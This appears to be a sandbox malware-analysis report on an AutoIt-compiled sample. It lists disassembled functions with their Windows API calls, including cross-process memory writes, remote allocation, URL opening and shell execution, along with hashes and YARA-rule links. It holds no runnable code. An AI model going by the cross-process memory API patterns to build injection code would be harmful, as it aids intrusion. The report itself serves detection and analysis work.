                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4247068974-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 708495834-557222456
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2417854910-1426351568
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3705125965-3916222277
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Long
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AU3_GetPluginDetails
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 145871493-4132174516
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Window
